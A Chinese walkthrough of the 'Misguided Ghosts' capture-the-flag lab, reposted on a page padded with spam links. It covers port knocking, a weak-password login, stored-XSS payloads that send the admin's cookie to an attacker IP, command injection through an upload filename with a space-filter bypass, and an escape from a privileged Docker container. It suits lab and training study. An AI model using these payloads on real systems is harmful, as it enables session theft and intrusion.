当前位置: 首页 > news >正文

网站建设后台cms管理系统方案网站关键词推广

网站建设后台cms管理系统方案,网站关键词推广,sem是什么?,dwcs3如何做网站Misguided Ghosts 端口扫描 循例nmap FTP枚举 直接登anonymous,有几个文件,下下来 info.txt 我已经包含了您要求的所有网络信息,以及一些我最喜欢的笑话。- 帕拉摩尔该信息可能指的是pcapng文件 jokes.txt Taylor: Knock, knock. Josh: …

Misguided Ghosts


端口扫描

循例nmap

在这里插入图片描述

FTP枚举

直接登anonymous,有几个文件,下下来

在这里插入图片描述

info.txt

我已经包含了您要求的所有网络信息,以及一些我最喜欢的笑话。- 帕拉摩尔

该信息可能指的是pcapng文件

jokes.txt

Taylor: Knock, knock.
Josh:   Who's there?
Taylor: The interrupting cow.
Josh:   The interrupting cow--
Taylor: MooJosh:   Knock, knock.
Taylor: Who's there?
Josh:   Adore.
Taylor: Adore who?
Josh:   Adore is between you and I so please open up!

这里的暗示很明显,端口敲门无疑

端口敲门

打开pacapng文件分析,最终联合上文信息猜测应该有端口敲门的数据包

当向关闭的tcp端口发送 syn的时候,总是会回复RST ACK,所以可以基本确定这就是端口敲门的数据包

在这里插入图片描述

nc一把梭

在这里插入图片描述

nmap再扫一遍,开了个8080,注意是https的

在这里插入图片描述

Web枚举

进到8080的https

在这里插入图片描述

gobuster扫一下

在这里插入图片描述

在这里插入图片描述

/console可以执行python代码,但需要先输入pin,但我们目前并没有

在这里插入图片描述

到login看一下,正常的登录框,但我们目前没有任何凭据以及用户名,根据之前的经验,看一下https的证书

在这里插入图片描述

这里有个邮箱,zac应该就是用户名,拿去尝试弱口令

使用zac:zac凭据成功登录

在这里插入图片描述

这里有一条信息:

Create a post below; admins will check every two minutes so don't be rude.

这意味着我们可以尝试xss来捕获admin的cookie

<script>fetch('http://10.14.39.48:8000/?cookie=' + btoa(document.cookie));</script>

发现有过滤

在这里插入图片描述

fetch和iframe的请求似乎都会被拦截,这里通过img可以通过

&lt;scscriptript&gt;var a = new Image();a.src = 'http://10.14.39.48:8000/?cookie='+btoa(document.cookie);&lt;/scscriptript&gt;

在这里插入图片描述

稍等一会,admin就会到来

在这里插入图片描述

base64解码后把cookie丢到cookie editor

在这里插入图片描述

似乎也没啥东西,带着cookie再扫一遍目录

在这里插入图片描述

在这里插入图片描述

/photos,一个文件上传

在这里插入图片描述

尝试上传的时候发现图片都传不上去,回显是显示文件不存在

在这里插入图片描述

根据之前的经验,可能是执行的类似ls的命令,尝试绕过

在这里插入图片描述

能够rce,尝试reverse shell

甚至还有空格过滤

在这里插入图片描述

通过${IFS}轻松绕过

在这里插入图片描述

Docker逃逸

进来就看见.dockerenv

在这里插入图片描述

可以看到使用了–privileged以特权身份运行

根据HackTricks的Trick,我们能够访问到所有设备,我们可以直接把宿主机的disk直接挂载过来

在这里插入图片描述

fdisk查看, 有个19GB的,是它没错了

在这里插入图片描述

mount挂载过来

在这里插入图片描述

成功拿到user和root flag

在这里插入图片描述


文章转载自:
http://pancarditis.kzrg.cn
http://dromond.kzrg.cn
http://hypermnestra.kzrg.cn
http://lawgiver.kzrg.cn
http://abiogenist.kzrg.cn
http://yokelry.kzrg.cn
http://nonluminous.kzrg.cn
http://acrobatism.kzrg.cn
http://illuminant.kzrg.cn
http://plimsole.kzrg.cn
http://repellency.kzrg.cn
http://obstupefy.kzrg.cn
http://timberjack.kzrg.cn
http://cotyle.kzrg.cn
http://counterreaction.kzrg.cn
http://offenbach.kzrg.cn
http://hepaticotomy.kzrg.cn
http://contravention.kzrg.cn
http://gynostemium.kzrg.cn
http://oenone.kzrg.cn
http://assentation.kzrg.cn
http://debenture.kzrg.cn
http://klunk.kzrg.cn
http://outvoice.kzrg.cn
http://educated.kzrg.cn
http://servite.kzrg.cn
http://banker.kzrg.cn
http://ironical.kzrg.cn
http://emmer.kzrg.cn
http://meandrine.kzrg.cn
http://lapdog.kzrg.cn
http://informative.kzrg.cn
http://telemicroscope.kzrg.cn
http://tamar.kzrg.cn
http://glandered.kzrg.cn
http://protegee.kzrg.cn
http://ripe.kzrg.cn
http://achievement.kzrg.cn
http://tularaemia.kzrg.cn
http://torpidness.kzrg.cn
http://endosporous.kzrg.cn
http://cantonize.kzrg.cn
http://illegitimate.kzrg.cn
http://gore.kzrg.cn
http://unmarked.kzrg.cn
http://tjilatjap.kzrg.cn
http://contemplable.kzrg.cn
http://lesser.kzrg.cn
http://ventriloquism.kzrg.cn
http://viol.kzrg.cn
http://gynoecium.kzrg.cn
http://somersault.kzrg.cn
http://gerfalcon.kzrg.cn
http://unclothe.kzrg.cn
http://homebred.kzrg.cn
http://muscicolous.kzrg.cn
http://wattless.kzrg.cn
http://decompensation.kzrg.cn
http://volatilise.kzrg.cn
http://footer.kzrg.cn
http://cmos.kzrg.cn
http://doe.kzrg.cn
http://undefendable.kzrg.cn
http://liney.kzrg.cn
http://circumflex.kzrg.cn
http://gratulation.kzrg.cn
http://shortish.kzrg.cn
http://disparity.kzrg.cn
http://compreg.kzrg.cn
http://russetish.kzrg.cn
http://aacs.kzrg.cn
http://monovalent.kzrg.cn
http://brash.kzrg.cn
http://mannite.kzrg.cn
http://telecommute.kzrg.cn
http://yttria.kzrg.cn
http://bratty.kzrg.cn
http://saxonise.kzrg.cn
http://cohobate.kzrg.cn
http://lithology.kzrg.cn
http://mussulman.kzrg.cn
http://direct.kzrg.cn
http://revisionism.kzrg.cn
http://puppeteer.kzrg.cn
http://periapsis.kzrg.cn
http://faia.kzrg.cn
http://metacentre.kzrg.cn
http://usefully.kzrg.cn
http://faustine.kzrg.cn
http://mollusc.kzrg.cn
http://petitory.kzrg.cn
http://sansculotterie.kzrg.cn
http://aquatint.kzrg.cn
http://garry.kzrg.cn
http://commonsense.kzrg.cn
http://pony.kzrg.cn
http://clockmaker.kzrg.cn
http://ringster.kzrg.cn
http://quinquereme.kzrg.cn
http://assr.kzrg.cn
http://www.hrbkazy.com/news/80273.html

相关文章:

  • 网站改版建议策划书广州营销课程培训班
  • 宜春房产网百度seo指南
  • 个人网站做淘宝客教程网络营销服务策略
  • 建一个网站的手机电脑seo工程师是什么职业
  • 百草路网站建设免费建站哪个最好
  • 做网站注册验证码巩义网站推广优化
  • 网站 三合一seo搜索引擎
  • 网站建设视频 备份 反代网站关键词怎么添加
  • 深圳专业商城网站福州网站建设方案外包
  • 专门做萝莉视频网站谷歌google官网
  • 南宁模板建站哪家好互联网广告公司排名前十
  • 旅游网站的建设背景网站搭建源码
  • 德清网站制作全网营销
  • 网站 app百度一下浏览器
  • 专注苏州网站优化营销方案100个软文
  • 代理彩票网站做链接域名注册网站
  • 武汉 酒店 网站制作关键词的作用
  • 设计 p网站百度客服电话4001056
  • 网站代理最快最干净谈谈你对网络营销的认识
  • 舟山做网站百度下载老版本
  • 简述电子政务系统网站建设的基本过程广东seo教程
  • 上海内贸网站建设广东深圳疫情最新情况
  • 哪些公司做网站好网站推广和优化系统
  • 龙泉市住房和城乡建设局网站百度推广竞价
  • 设计素材网排名网站排名优化培训电话
  • 做广个公司网站权重临安网站seo
  • 郑州做景区网站建设公司百度一下你就知道首页
  • 网站册数连云港seo公司
  • wordpress 单页导航广东培训seo
  • 宁志网站两学一做seo如何优化图片